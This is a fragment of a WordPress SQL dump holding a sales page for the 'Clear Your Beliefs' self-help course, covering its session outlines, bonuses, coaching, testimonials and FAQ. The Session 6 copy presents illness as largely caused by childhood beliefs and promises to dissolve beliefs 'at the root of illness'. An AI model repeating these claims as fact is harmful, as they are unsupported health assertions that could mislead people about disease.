and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:22:10', '2014-12-14 19:22:10', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
